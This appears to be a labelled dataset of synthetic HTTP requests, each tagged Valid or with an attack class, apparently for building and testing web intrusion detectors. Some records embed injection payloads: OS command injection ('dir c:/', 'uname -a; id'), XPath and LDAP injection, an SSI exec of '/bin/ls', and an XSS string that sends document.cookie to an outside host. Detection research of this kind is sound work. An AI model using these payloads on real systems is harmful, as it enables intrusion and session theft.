Transfer-Encoding: gzip
Upgrade: gise/4.4, ekas/4.1, Clis/0.2
Warning: 139 123.133.191.85 "aoRovfiyaetlwhiotHa" "Tue, 27 Apr 10 21:16:33 GMT"
X-Forwarded-For: 199.93.92.127
X-Serial-Number: 3591562194850483
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45736
Start - Id: 44138
class: OsCommanding
GET /scripts/file.bat" "& dir c:/ .exe? HTTP/1.0
Host: 220.217.12.204
Connection: keep-alive
Accept: audio/*;q=0.1
Accept-Charset: windows-1250;q=0.6, x-mac-arabic, windows-1252, x-mac-arabic;q=0.0
Accept-Encoding: gzip;q=0.2
Accept-Language: *
Cache-Control: min-fresh=7887
Client-ip: 139.133.159.204
Cookie: ildrta4scee=phphrusraoy5riyeoiur;7E;gtfepoAtve=wit<;ssa43m=E2dr;@S63Ts8W=optb;Oine_aeJEkvK3=oeadLrS
Cookie2: $Version="03"
Date: Tue, 08 Apr 08 07:29:20 GMT
ETag: W/"1NbZPG6M0jtLITPTw7L"
Expect: a4isd=lhzrab3;nfrsWe=ryefi
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Fri, 29 Jan 10 02:08:33 CET
If-Unmodified-Since: Mon, 02 Jan 06 19:23:03 CET
If-Match: *
If-None-Match: "WQF80hU2E1PKaBC"
If-Range: Thu, 11 Dec 08 03:15:45 UTC
Max-Forwards: 541
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: NTLM bzRQbmppdWxvc2hiaWlpc2k2YkFlZTBydGh4eWJwZXlldHRBbmw2am5h
Authorization: ogSor oauhe=c6eam
Range: 2856-325921,765830-7785,3752-597
Referer: /zwson5/itjyeO/usoenti/idiyat/rialee8.doc
TE: chunked;q=0.0,trailers,trailers
Trailer: Upgrade
User-Agent: e0x3sESM_R http://www.ahitm.be
UA-CPU: PowerPC
UA-Disp: 010,645,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1501x189
Via: HTTP/5.3 www.hwotrscu.jpg, HTTP/6.0 www.fsyrl.css, 1.0 www.bugi0bd.js
Transfer-Encoding: identity
Upgrade: bletts/8.4, eawgt/6.8, sXn/8.3, sei0e/5.7
Warning: 657 www.tegeEE.jpg "hm9idit" 
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 44138
Start - Id: 35540
class: XPathInjection
PUT /gias7sni/l1jil/qx3rrviz/e5PY/0ktDabtut9iseae/l3B9/rjEC4/etai94P58s/esdtFbe7etss/sy.aspx? HTTP/1.0
Content-Length: 166
Content-Language: edsvznp,undgamr,elulo1e
Content-Encoding: compress
Content-Location: http://www.axdCs.net/merw.pdf
Content-MD5: dHJkbzd0cnlib3JwbGVpUA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 20 Nov 04 17:50:51 UTC
Last-Modified: Sat, 07 Feb 09 03:32:52 CET
Host: www.7hnrwOb63o.cz:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.3, gzip;q=0.3
Accept-Language: *;q=0.3
Cache-Control: max-age=34319
Client-ip: 50.148.205.107
Cookie: hb=uektn:tsnn|g;bvfe6onQmWReeU=t12Zz--BL1
Cookie2: $Version="9"
Date: Fri, 14 Dec 07 02:54:32 UTC
ETag: W/"YthNYXXNEQKeFuBoXKu9"
Expect: 100-continue
From: Q6fua@alfpse.net
If-Modified-Since: Wed, 30 Nov 05 14:45:16 UTC
If-Unmodified-Since: Tue, 24 Jan 06 01:48:20 CET
If-Match: "QcyQ.HFsiXa.4k-eRUJ"
If-None-Match: "ey4TpTgzmWzSm9l_w"
If-Range: Thu, 07 Jul 05 10:30:12 UTC
Max-Forwards: 6
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: NTLM aHJtZTJlYWVzZXIwb2VybGVlb21yOGFuZU5pcnBpam50aQ==
Authorization: Digest algorithm=MD5-sess
Range: 7-26018,971548-,-1
Referer: http://www.lXpi7V.fr/sxozc/h1ctN7Ez.asmx
TE: trailers,chunked
Trailer: Host
User-Agent: iNzLG9b6 http://www.avecgl.uk
UA-CPU: 68000
UA-Disp: 740,794,8
UA-Pixels: 502x021
Via: wwfubf/2.3 225.79.153.111
Transfer-Encoding: compress
Upgrade: rqh/0.3, h5Re/1.2, 2i9ytr/6.7, dnnc/3.7, eie/9.3
Warning: 559 www.obo9.js "F7ceoat8n5sa5ne" "Wed, 18 Nov 09 09:39:58 UTC"
X-Forwarded-For: 73.71.14.52
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dhetiel=86w7lodj'     or  1<    5Ehfh/w/Pruhi1/child::text()[position()=13]   or  'hidhrl' =  '&nniscxe9aoSaet2=iexecrudeaai]ww 

End - Id: 35540
Start - Id: 36735
class: OsCommanding
GET /eehe1a1itCh8ct5/lHe8zTvknbhZmE/mal/rb/EFM7mB6QzK.msf?achuew=%3B++++echo++%3B+++w+++%3Buname+-a+%3B+id HTTP/1.0
Host: 78.91.33.158
Connection: vmTed
Accept: audio/x-wav;q=0.3, application/zip;q=0.8, text/*;q=0.0
Accept-Charset: x-mac-cyrillic, iso-8859-2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=4844
Client-ip: 103.144.20.186
Cookie: Ettra=5;hNsWLxtlrs6h=8;nAaeekcme0eu=7597;csasnsai=6ajtmrzwmtoaqyYyyh;JGy-5obetween=BYc
Cookie2: $Version="79"
Date: Wed, 15 Feb 06 03:08:14 GMT
ETag: "FaWmKnGLIj3GuDEP9"
Expect: 100-continue
From: uehzS@rs1ylsy5.ch
If-Modified-Since: Sat, 26 Aug 06 19:08:23 GMT
If-Unmodified-Since: Tue, 06 Dec 05 03:35:11 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 22 Feb 07 24:14:29 GMT
Max-Forwards: 418
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: it0a ison5ofO=srsyk
Authorization: arbdmm d5imtsen=htu1tR
Range: -47510,582-0
Referer: /cM6Trfsd.shtml
TE: gzip,trailers,deflate
Trailer: Cache-Control
User-Agent: txTnsl
UA-CPU: Sparc
UA-Disp: 8267,5613,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 402x4966
Via: qet46d/6.3 www.tT9o.gif
Transfer-Encoding: deflate
Upgrade: rss8so/4.4, hNo/7.8, dfee/8.1
Warning: 867 151.26.59.212 "etraSdoEtTi83ctsms0" 
X-Forwarded-For: 246.253.133.9
X-Serial-Number: 5966336
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36735
Start - Id: 20432
class: Valid
GET /sjsgcjegdIrutvu/m@Z.155YC/n_XgzHAEaV5lx_/wYSNAJLNJZi/0xJLBqKWNwkJxw/eVLH@bgf_bx9d1/2bz0WniJksFCIe/3een8oWFTaElsngd9e.jpeg? HTTP/1.0
Host: www.znMrTe.gov
Connection: hjcqtd
Accept: */*;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: compress;q=0.5, identity
Accept-Language: *;q=0.5
Cache-Control: max-stale=730
Client-ip: 138.229.4.76
Cookie: yLLF=847181153;Adnetn=saen s+2
Cookie2: $Version="63"
Date: Thu, 15 Oct 09 04:19:42 UTC
ETag: W/"J5a8UxTuwAtRopVlERn"
Expect: 100-continue
From: baet0r@XRdlittsO.fr
If-Modified-Since: Tue, 29 Jan 08 10:04:25 GMT
If-Unmodified-Since: Tue, 03 Aug 04 02:57:25 UTC
If-Match: "_F19zrgUwU_jq36dvDxx"
If-None-Match: "Pj.Aep2BcSE8Xh2A"
If-Range: *
Max-Forwards: 3
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest algorithm=8wrlnobo
Range: 06141-
Referer: /8ittouo0.fgf
TE: deflate;q=0.0
Trailer: Authorization
User-Agent: aPnvCM9 http://www.uoare.fr
UA-CPU: 68000
UA-Disp: 241,776,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8091x908
Via: 2.3 16.171.167.65, 9.7 149.8.232.177:4481
Transfer-Encoding: compress
Upgrade: cEO/3.2, a7eero/1.3, tQxeth/8.1
Warning: 507 147.216.24.122 "tsXo1ea" "Wed, 04 Jun 08 11:36:12 UTC"
X-Forwarded-For: 92.6.156.80
X-Serial-Number: 36796003300
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20432
Start - Id: 28721
class: Valid
GET /7SLqipjJzZSW1/62linkopt/ejC6APVnnKkCGIOKnM/a8n/ieweteesbeqhreay.css?5Or=93846126&eaowltyeni=805&phi1eas7ueted=d97ewhei4Nde3ic&oaikeIisidez=Og%3FOn+&yca8tsu7=1nTsy3aor&4MQ@MMnoZRS=hs&Hsta=vHUju-CV&eero=gtAok%28ikb&listwd=dmo&rfenzUfEm=ametai&jltha4c=exGO HTTP/1.0
Host: www.oeAndest.it:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-8859-3
Accept-Encoding: 
Accept-Language: tbdtot-bhbian;q=0.2, tt-sahu, o-bern;q=0.9, sa-aail, lu-eyr;q=0.3
Cache-Control: max-age=8162
Client-ip: 108.135.145.93
Cookie: tahom5n=sq8ch=0atW:
Cookie2: $Version="7"
Date: Sat, 11 Nov 06 01:25:18 CET
ETag: W/"ZTtXFp@@SCj_TFuFaKN"
Expect: wiha=9ueo5w;uns1sl
From: cmNaehb@twerq2.gov
If-Modified-Since: Wed, 30 Aug 06 09:39:01 CET
If-Unmodified-Since: Fri, 18 Apr 08 13:38:55 UTC
If-Match: "DwjsTsIBAxTH.wn1Zm4X"
If-None-Match: "kK4WdFOi7yI_K7F"
If-Range: *
Max-Forwards: 29
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest opaque="P5en"
Range: -5
Referer: http://Gsoexf.it/noht/aseei.jpg
TE: chunked,gzip,chunked;q=0.1
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.1 (Windows; U; Win98 1.6; 4t-sf; rv:6.7.6) Gecko/28402153
UA-CPU: PowerPC
UA-Disp: 9543,263,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 621x541
Via: 6.5 www.kq5e.css, HTTP/6.3 140.45.125.121:30968
Transfer-Encoding: d4nit
Upgrade: fsum1e/6.1, i6ee/7.9, ijopmA/5.0, jtoin/2.2
Warning: 642 11.210.65.54:24773 "arbhrinytrt" 
X-Forwarded-For: 41.255.95.49
X-Serial-Number: 840252996378195680
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28721
Start - Id: 10926
class: Valid
GET /e3mh/c1jxtyr@G/IwnEvR/Escript1likeNl@/cDUeRux-MqVnI.php3?phry=5aN6sNumll&li3insnNNds=c+&hvrrntr=m3thar&lxblEp1h0=wTGFoG&e1y=5havingt&st=irbat&aed9oh=oaen5o&6eFf9hdodm=1900&eee3ne=hmso&BIFkpsetcnsock_streamservicessPT=%26script+&dllofbecc=6402&sLGO=oeOeotgiiross7L9&UdI7-replacexE0=sosloate9heruvoheS&oe7ywesfkcutsV=dsnea-++tss6ihrepb&nrhoiKnsitU4gz=heosvp7dlrthulepj HTTP/1.0
Host: www.EaDiisee.com
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-15
Accept-Encoding: deflate, identity, identity;q=0.5
Accept-Language: *;q=0.7
Cache-Control: min-fresh=73850
Client-ip: 169.53.224.3
Cookie: efob=52922
Cookie2: $Version="60"
Date: Wed, 16 Nov 05 02:53:01 GMT
ETag: "Gxu@iATnyFDiSEWq"
Expect: 100-continue
From: dmnba@sipo.net
If-Modified-Since: Wed, 01 Dec 04 16:31:01 UTC
If-Unmodified-Since: Sat, 01 Apr 06 19:50:16 UTC
If-Match: "b4bzTzWtppidHEmQV"
If-None-Match: "oX-t61FUPUK_rLqQ5"
If-Range: Sun, 15 Nov 09 07:34:49 CET
Max-Forwards: 8
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: tocs en3easx=cEno
Authorization: Basic OTd3dGw6dG9ldGJF
Range: 588592-19738,0954-52796,229852-
Referer: http://ozaotd.ch/rniB/obngp/tdtshe/ozo71.asp
TE: trailers,deflate;q=0.6,trailers
Trailer: If-Match
User-Agent: n3adtanor/1.4.4.4.7
UA-CPU: PowerPC
UA-Disp: 7000,971,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 5309x7001
Via: 0.6 www.ecaes.shtml, rtis/5.5 www.lymd1.tiff
Transfer-Encoding: identity
Upgrade: xivl/0.5, eLO/6.4
Warning: 236 www.anncO0t.jpg "tlYaoiMnHeoasniuo" 
X-Forwarded-For: 191.57.65.52
X-Serial-Number: 847206508501943209
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10926
Start - Id: 9676
class: Valid
GET /i7jthmhtd0bibit/r2teigeTdhlr/y8etoufcRoellOy.bin? HTTP/1.0
Host: 225.170.49.8
Connection: close
Accept: */*;q=0.8
Accept-Charset: iso-8859-1;q=0.7, iso-8859-1;q=0.3, x-mac-korean;q=0.3, windows-1255;q=0.7
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-cache
Client-ip: 6.215.182.6
Cookie: lnaxE=ee;se=idtt;IWzBLtmp--V5i=ztwhere9anph-telnet:r7i0d;ssrs=uniont;9cea eus['eaf0A;o.BmYyi=tyw;nDhpu2na=80
Cookie2: $Version="42"
Date: Mon, 05 Sep 05 07:45:26 UTC
ETag: W/"PqsVHiazbDd0py0Bh"
Expect: 100-continue
From: iuk0oa@fws8tcnse.st
If-Modified-Since: Mon, 14 May 07 13:30:03 CET
If-Unmodified-Since: Sun, 14 Sep 08 15:55:31 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 22 Nov 06 20:01:20 GMT
Max-Forwards: 02
MIME-Version: 6.8
Pragma: Ue='d'
Proxy-Authorization: NTLM bXk1bm1taGV0cmFtaGluMUlubmlxYnBic3l3OXVFdHVzeW50aXlpc29hdHllZUlt
Authorization: C7yakw tcsulw=srrif
Range: 7-
Referer: /UAer3a4/uergc/sNcnh/elobc/e8t9.zip
TE: gzip
Trailer: Date
User-Agent: iweeiOhtse9yrGsf5
UA-CPU: x86
UA-Disp: 229,8929,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 669x055
Via: PlIauu/6.1 103.234.14.226, 2.8 www.Rfhe9.gif:7, 6.3 www.nresensa.jpg:66
Transfer-Encoding: gzip
Upgrade: era/6.9
Warning: 696 www.eqhaon.js "snzehBcaua8nt" 
X-Forwarded-For: 48.192.127.27
X-Serial-Number: 66630290652
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9676
Start - Id: 4846
class: Valid
POST /eUc8jIhd7ESsM/uthoJElzedgoheTree/np8jxOF1_tTB9PT9o/passthrup-yB3eval0/h2FsuhxTRulm2ALV1h4z/3replace/a6v_CBWkEYsAkOV/tZeYinwZPlM7-cLxHL7.php3? HTTP/1.0
Content-Length: 265
Content-Language: i,5tiltwe,dg
Content-Encoding: gzip
Content-Location: http://www.etyh.org/impIreRh.avi
Content-MD5: bWtyenRjb2VqbG9pbHJTcw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 22 Jun 06 24:31:34 GMT
Last-Modified: Tue, 25 May 04 17:21:38 CET
Host: 230.103.11.30
Connection: keep-alive
Accept: image/png, video/*, video/*;q=0.2
Accept-Charset: iso-2022-kr;q=0.8, x-mac-greek
Accept-Encoding: gzip, identity;q=0.9, deflate, gzip
Accept-Language: dv-etc0sbh
Cache-Control: max-age=3
Client-ip: 188.228.34.221
Cookie: ndsnnkApansSym=enepcsElli;yrwksneiRec=62;i9oeqdC=72989047
Cookie2: $Version="639"
Date: Wed, 29 Oct 08 05:15:35 CET
ETag: "lUqoSzzB.@-hL@tfIz"
Expect: 2Erut
From: nhsan@2Rabgt7e.net
If-Modified-Since: Mon, 29 Nov 04 22:38:32 GMT
If-Unmodified-Since: Sun, 02 Jan 05 10:12:08 CET
If-Match: "sWFwzwx9urZHiFzt4N"
If-None-Match: *
If-Range: "Z-7o_twU9O-0TexL.nax"
Max-Forwards: 2
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: naIcSN re1rfCoS=bpehrr
Authorization: Basic bTJyZ2hubzphY2lsNg==
Range: -2648,-1383,481-169
Referer: http://dtaheoi.de/at9ehmo5/inhpkib.htm
TE: deflate,chunked
Trailer: Accept-Language
User-Agent: Mozilla/4.9 (Windows; U; WinNT 4.6; a7-Ot; rv:2.4.3) Gecko/00051525
UA-CPU: Sparc
UA-Disp: 092,446,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 812x666
Via: 9.8 www.elqoia.jpg:7
Transfer-Encoding: identity
Upgrade: blg/4.2
Warning: 714 www.gNbN.shtml:866 "rlagij2neSygelcdhn9a" "Tue, 10 Mar 09 19:39:56 UTC"
X-Forwarded-For: 191.124.85.186
X-Serial-Number: 688276935690
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

9tlNi9e3iL=vfscriptganlibwTUlimr &2o=89&strecan=xdiaycnLe fso-&l82QconnectXcC8=tXE3-jjEvBRt&auaeGbR=lZs6xEj8u&snnrSMndwXhto=H1o@obsformgoconnectoiEt/tas&Iihbjeftuan=548685683&yiltneAaod5=dtSeslrrc&S0FLpPsUmail=29&DorehreouYica=681420&e2ngwmseigsesb7=ne+(fdo

End - Id: 4846
Start - Id: 47620
class: XSS
GET /e@WiCkBpwXTi/ngTe/ep2lBGyUn2Q9@H6a/tCCq0w7tQ@jms1Bgzb/Qcopy/tmpKrU/-0/cP9B6nh4rO0/6rtlanf1nfontlras.jpg?tni0Ai=101340&sophrs5ae=ao&nQtwaodd=vtm&gfaWryTe=a%40bjv.E9KCXQ&0execfdfromupdate5Gfe=94&OsRS4tvDCuL.=%3Cobject+++classid+++%3D++++%22+clsid%3A...%22++codebase+%3D++%22javascript%3A+++%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.mani.com%2Fcgi-bin%2Ftrni.cgi%27%2Bdocument.cookie%29%3B%5D%22+%3E&n6=ryiiq&ooquvemiscffstu=60393&8od=%266+%3Epl%5De2%3Bsomwl&sa1Ase=ln1hAntrnnhrtvdy&ToanEee=t3throcepdae&r9leYBnFlocation=idNlbhd&roi=eAJIOPvq&Uz5jHRfs9S1=eiinZ HTTP/1.0
Host: 14.101.241.238
Connection: close
Accept: */*;q=0.0
Accept-Charset: euc-jp;q=0.2, iso-8859-5;q=0.6, windows-874, euc-tw
Accept-Encoding: 
Accept-Language: shta-t4ihi0, it-eat6uolf;q=0.7, n-kak;q=0.0, be5t-ilhanb;q=0.0, AUahetce-4
Cache-Control: no-cache
Client-ip: 158.187.180.34
Cookie: nhem96d= 6;tmSaa7hsorrac=6131197;e2hdotj1LdSet=o2JS3kK;asngs4sI=d4kperl0;l2=od
Cookie2: $Version="5"
Date: Thu, 25 Feb 10 22:01:01 CET
ETag: W/"yBEcpab3o9aU.FzIZZ"
Expect: 100-continue
From: drEnA@edtwavoDoa.com
If-Modified-Since: Mon, 31 Aug 09 08:52:38 UTC
If-Unmodified-Since: Wed, 04 May 05 10:55:11 CET
If-Match: "0RSXYfsh1Zj@J5Hh_"
If-None-Match: *
If-Range: Sun, 10 Jul 05 19:57:30 UTC
Max-Forwards: 045
MIME-Version: 5.8
Pragma: wi3hki='Rd3e9als'
Proxy-Authorization: Basic b29iYWU6c3NpdnI=
Authorization: Basic ZHN0d25pZDp0b2hy
Range: 393273-
Referer: /aDaoel/9tse/So4Pl.swf
TE: deflate;q=0.3,gzip;q=0.3,chunked;q=0.6
Trailer: Expect
User-Agent: rnen (na2veFJFR)
UA-CPU: StrongARM
UA-Disp: 722,561,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 608x141
Via: dvo/8.7 www.nhabn.jpg, HTTP/8.2 98.68.186.11, FTP/5.0 www.oS7tcr8a.js
Transfer-Encoding: deflate
Upgrade: piajie/8.1, 2et/2.5, 7inhes/4.8, cdhiar/4.9, 3uyvrn/7.3
Warning: 114 www.elevwen.jpg "oserePt" 
X-Forwarded-For: 19.35.93.68
X-Serial-Number: 2524902769036083814
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47620
Start - Id: 39002
class: LdapInjection
POST /ewb-LBrl1S/f9u41bt2rnoesu8bp0s/a8H/3Q_lgXhzLb/yIlnAp@Qqp.W/4Ctuesrestntt/pholUgCZ8/httpsC./3kaTUwhereNP/agshsebotuas0oteasxd.jpeg? HTTP/1.0
Content-Length: 231
Content-Language: iotmsuet,8dvm
Content-Encoding: compress
Content-Location: http://www.iEoy3Knn.be/loeoksn/Eoffhe/nieDiuyh/0w4hc.asmx
Content-MD5: RmJsdHJuQm5Fb3JvdHVsYg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 Jul 05 21:07:29 UTC
Last-Modified: Wed, 11 Oct 06 22:46:49 UTC
Host: 135.26.27.91:80
Connection: close
Accept: image/*;q=0.9, application/*;q=0.6, text/*;q=0.8
Accept-Charset: cp-950, euc-jp;q=0.5, euc-cn;q=0.8, windows-1258;q=0.6, iso-2022-kr
Accept-Encoding: deflate;q=0.7
Accept-Language: fEashol-0u, amsJThde-Uu7ldd;q=0.1, oi8tFe-eaEl;q=0.6
Cache-Control: Bs='dts'
Client-ip: 205.198.95.102
Cookie: eoeesetuero=tPer;sathhAD=Rhlom;e6al9=7;caeeaet=udivy-lrta 
Cookie2: $Version="008"
Date: Wed, 23 Dec 09 08:04:17 UTC
ETag: W/"VPJnp3@veVviL60"
If-Unmodified-Since: Sat, 19 Sep 09 17:15:23 CET
If-Match: "xzYVfw_5@It4i0lNBG8"
If-None-Match: "NK_Ynt9S.qtIvuB4MAr"
If-Range: *
Authorization: Digest nonce
Referer: http://www.c2Tbxld.uk/a7d7t/ihetlich/gs8dmnin/kLcj/iqr0.jpg
TE: chunked,trailers
User-Agent: )(  |    (  cn=*o'brien*   )(mail   =*o    'brien*    ) 
UA-CPU: x86
Transfer-Encoding: gzip

ennhiaEra4ntbb=mk-mto&5etni5=785915749&telnet6wEChG-gO2=098063&msoruazt1=uw&eonrosuflnlhw70=mwd4nryio1'ec&zng=n&dcatenHa24=69&h3=Olv&nsLdaeraoseua=it1o%&1YCsam6ghimgIDX=rv&hopEti6et=:tHlikeneconnectDd&oOlb&n5ohn7e5iaesm=946

End - Id: 39002
Start - Id: 39911
class: SSI
PUT /tRf4MilIyLV-h_D/FyRJw6nph-/ksUI/bj/EdmmmejhtnNnn0v/fqWBahtpassef1where/uxWzKoh/t6rhm0Sj3kDjIzQ1CylA.shtml? HTTP/1.0
Content-Length: 252
Content-Language: g8lc5hae,IxrEmaM
Content-Encoding: identity
Content-Location: /55typtse/otunnsoe.tiff
Content-MD5: a25pZXNoNjZ1MmJ5bWJlaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 18 Jan 08 15:13:36 UTC
Last-Modified: Tue, 19 Jul 05 03:53:07 UTC
Host: www.oNeneaup.cz:80
Connection: 9Ortl
Accept: */*
Accept-Charset: x-mac-icelandic;q=0.3, x-mac-korean;q=0.7, shift_jis;q=0.9, iso-8859-2, cp-936;q=0.1
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 239.36.31.16
Cookie: b1p=bo
Cookie2: $Version="7"
Date: Mon, 26 Jul 04 01:06:13 CET
ETag: W/"KujfBaJYEnNh-svZHP"
Expect: cs2a2eya
From: etiwhOvt@03yWr.net
If-Modified-Since: Sun, 07 Aug 05 23:25:03 CET
If-Unmodified-Since: Sun, 19 Apr 09 07:34:41 GMT
If-Match: *
If-None-Match: *
If-Range: "Xedi0o0y5rPO_S_4"
Max-Forwards: 984
Pragma: aed5=ead
Proxy-Authorization: Digest response="dD0B7d539F14ACC6a145A7c016DF9930"
Authorization: Digest cnonce="DmWeetx"
Referer: /lhtslxj/dif5eu8.tiff
TE: trailers,deflate;q=0.8,trailers
Trailer: Trailer
User-Agent: Mozilla/7.4 (Machintosh; U; PPC Mac OS X 9.7; Et-un; rv:8.2.4) Gecko/10367405
UA-CPU: StrongARM
UA-OS: Win9x
UA-Color: color16
Via: HTTP/5.8 161.47.96.155
Transfer-Encoding: deflate
Warning: 151 www.ttt8oAn.jpg "coIndbni" 
X-Serial-Number: 430786884231
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

elneatnnbY=dd&etnio=45826&aeewn=<!--   #exec     cmd="/bin/ls    -l     /home/lebiNi/adlihrwmo" -->&ocoebdtelerGswc=283&oe=77949157&nlaaaNdvonksM=9o&R0eeeseiono=x 0ew&n6tt1nlVeyes1=od?&K.@0ltv8deletej=19523512&phoiorrc61ii=733

End - Id: 39911
Start - Id: 37111
class: LdapInjection
GET /ts.php3?rhIt=pttoinc%7EoeUesn1vshutdownhooh&5haato=5&Aczbhhht=ob5ho&0nc=k&NEieoe=sldE9Dtkptht&b6b0X@=3304234&qgO1_g@H@=atrtimgh+drco&cexytIr=AtlashcAer&cou=hcne%29%28++%7C+++%28deega%3D*%29&iogetad1j=sebBltRH&haIiqsdr=24&steSszUR=1688&i9t=5491&edaIn=eboot.ininc27eial&deinrh5l6Hlsw=gB HTTP/1.0
Host: www.snib7tewd.be
Connection: close
Accept: application/*;q=0.0, application/x-tar, video/*;q=0.3
Accept-Charset: *
Accept-Encoding: gzip, compress, identity;q=0.6, identity, identity
Accept-Language: Ntdtc-hare;q=0.3, Rbw-tTxrlled;q=0.0
Cache-Control: trdt=toarbaed
Client-ip: 82.149.38.78
Cookie: atfeoadoscanna=4169735;3iuwoko5l=openent w\zo4t9u~Ur n );4duetdAiron=eFkyKzo;ePfromR_Da=uo;aia41p=a8Q4iR@kc
Cookie2: $Version="656"
Date: Tue, 29 May 07 19:51:16 GMT
ETag: W/"qI2oENPhGRoQTyWi6-C"
Expect: 100-continue
From: moaqfoa@te8R.fr
If-Modified-Since: Fri, 19 Jan 07 24:32:59 CET
If-Unmodified-Since: Mon, 07 Jun 04 09:27:04 GMT
If-Match: *
If-None-Match: *
If-Range: "hSj..vl.bW0DN9X1qDQ8"
Max-Forwards: 4003
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Basic ZWVKbmI6ZGk1OHI=
Authorization: Digest response="22AF7033a49C83DF9fE5d8bDEc06BEe0"
Range: -12929,-403
Referer: /ema6tNh/7aus/rwawtdze/lgto/toOc4a.cgi
TE: trailers,trailers,chunked
Trailer: Via
User-Agent: mCuSbe http://www.iapsuEm.net
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 617x3755
Via: 5.5 40.219.191.192:1590, 9.9 www.mitmm.html, 8.9 www.oe6AE.tiff
Transfer-Encoding: compress
Upgrade: rPog/6.3, anziha/1.6, Aaolrp/4.1, ige/4.9, mu8/9.9
Warning: 296 92.253.127.230:14 "0shhdnca" "Sun, 22 Feb 04 22:26:45 CET"
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 85332942046227560401
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37111
Start - Id: 18675
class: Valid
GET /3mQ9kIsaautoexec@/eQyO7wBCM.STo_ws/lio/et1nquueRnile/mw58@YOKPW8OKPup-9aV/0anaamifddesexssc7ok/srnlAaeiI76aoT/9C4j/mh2mjQuiQw/.c44C6connect2bDkt.swf? HTTP/1.0
Host: 247.2.190.9
Connection: close
Accept: text/html;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=26216
Client-ip: 235.32.209.124
Cookie: saszmuya=9;jdxddaalila6te=ysk_Ai3rQtH;4jertjo=oz1e;astoctr=394004303;tbyntne1=h;ce=asystemo>a
Cookie2: $Version="59"
Date: Mon, 29 May 06 16:24:28 GMT
ETag: W/"sDYaiLc2SXxpEpnuQPw"
Expect: 100-continue
From: hloyosxc@tEpaaeg.de
If-Modified-Since: Sun, 27 Feb 05 03:23:27 CET
If-Unmodified-Since: Fri, 21 Oct 05 05:00:32 UTC
If-Match: "H0Sl_Pn2gUljY1V"
If-None-Match: "WQZNk6TFLgxUxAXzk"
If-Range: Sun, 29 Mar 09 24:20:47 GMT
Max-Forwards: 613
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM ZUhoaHRrZVJsaGVicGJzelFzSWZoZGV1c3JpUzBzdG5ycmxpNGJhOGRuaWxidG4=
Authorization: Digest nc=9bedeAFe
Range: -65,607666-2498,-1
Referer: /51teiueh/ene5/judNr/ii4nsh/aetxri8s.msf
TE: gzip;q=0.7
Trailer: If-Match
User-Agent: tsjdfdgh (nmX-0ruWw; kToqqzyO)
UA-CPU: MIPS
UA-Disp: 8675,230,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 8595x9488
Via: 5.2 213.61.250.148:33, hchEe/5.5 164.241.251.33, HTTP/5.2 www.oh4e.jpg
Transfer-Encoding: deflate
Upgrade: Ctu57e/3.8, chee/8.1, lrvDmi/8.7, i9hei/6.7
Warning: 599 248.78.6.97 "deo0tiacbum" 
X-Forwarded-For: 241.151.124.130
X-Serial-Number: 04013
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

